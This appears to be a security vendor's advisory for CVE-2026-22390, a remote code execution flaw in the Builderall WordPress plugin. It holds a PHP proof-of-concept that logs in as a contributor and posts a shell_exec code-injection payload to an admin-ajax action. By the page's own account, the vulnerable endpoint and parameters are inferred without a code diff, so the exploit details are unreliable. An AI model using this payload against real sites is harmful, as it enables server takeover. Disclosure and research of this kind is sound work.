Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-22390: Builderall for WordPress <= 3.0.1 – Authenticated (Contributor+) Remote Code Execution (builderall-cheetah-for-wp)

CVE ID CVE-2026-22390
Plugin builderall-cheetah-for-wp
Severity High (CVSS 8.8)
CWE 94
Vulnerable Version 3.0.1
Patched Version
Disclosed February 24, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22390 (metadata-based):
This vulnerability is an authenticated Remote Code Execution (RCE) flaw in the Builderall for WordPress plugin. The vulnerability affects all plugin versions up to and including 3.0.1. It allows attackers with Contributor-level or higher WordPress user privileges to execute arbitrary code on the underlying server, leading to complete compromise.

Atomic Edge research infers the root cause is Improper Control of Generation of Code (CWE-94). The plugin likely unsafely passes user-controlled input to functions like `eval()`, `system()`, or `popen()` within a privileged WordPress hook. The vulnerability description confirms authenticated access is required, but the exact code path is unconfirmed without a diff. The CWE classification strongly indicates direct code injection, not a secondary vector like file upload leading to RCE.

Exploitation likely involves sending a crafted HTTP POST request to a WordPress AJAX handler (`/wp-admin/admin-ajax.php`) or a specific admin endpoint. The request would contain an `action` parameter corresponding to a vulnerable plugin hook, such as `builderall_cheetah_for_wp_action`. Another parameter would contain the malicious payload, potentially PHP code for direct `eval()` or a system command. The attacker must be authenticated as a Contributor, which typically allows creating posts but not publishing them.

Remediation requires removing any direct execution of user-supplied code. The plugin must validate and sanitize all user input before processing. Functions like `eval()` should be eliminated. If command execution is necessary, arguments must be strictly validated using an allowlist. The patch should also enforce stricter capability checks, though Contributor access is already a low bar for this severity of flaw.

The impact of successful exploitation is severe. An attacker gains the ability to execute arbitrary operating system commands and PHP code with the web server’s privileges. This leads to full server control, data theft, website defacement, and a foothold for lateral movement within the hosting environment. The CVSS score of 8.8 (High) reflects the high impact on confidentiality, integrity, and availability.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-22390 - Builderall for WordPress <= 3.0.1 - Authenticated (Contributor+) Remote Code Execution
<?php
/**
 * Proof of Concept for CVE-2026-22390.
 * This script demonstrates authenticated RCE against a vulnerable Builderall for WordPress plugin.
 * ASSUMPTIONS (based on CWE-94 and WordPress patterns):
 * 1. The plugin registers a privileged AJAX action hook (e.g., 'builderall_cheetah_for_wp_action').
 * 2. The hook unsafely evaluates user input from a POST parameter (e.g., 'code' or 'command').
 * 3. Contributor-level authentication is sufficient (requires valid WordPress cookies).
 */

$target_url = 'https://target-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS

// Step 1: Authenticate to obtain WordPress session cookies.
// This simulates an attacker with valid Contributor credentials.
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$login_response = curl_exec($ch);

// Step 2: Send the exploit payload to the suspected AJAX endpoint.
// The exact action name is inferred from the plugin slug.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'builderall_cheetah_for_wp_action', // Inferred vulnerable action
    'code' => 'echo shell_exec('id');', // Example PHP code injection payload
    // Alternative payload for direct command execution:
    // 'command' => 'id',
    // 'nonce' => '123456' // May be required but often missing in vulnerable code
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);
$exploit_response = curl_exec($ch);
curl_close($ch);

// Step 3: Output the server's response.
echo "Exploit Response:n";
echo htmlspecialchars($exploit_response) . "n";

// Cleanup
@unlink('cookies.txt');
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School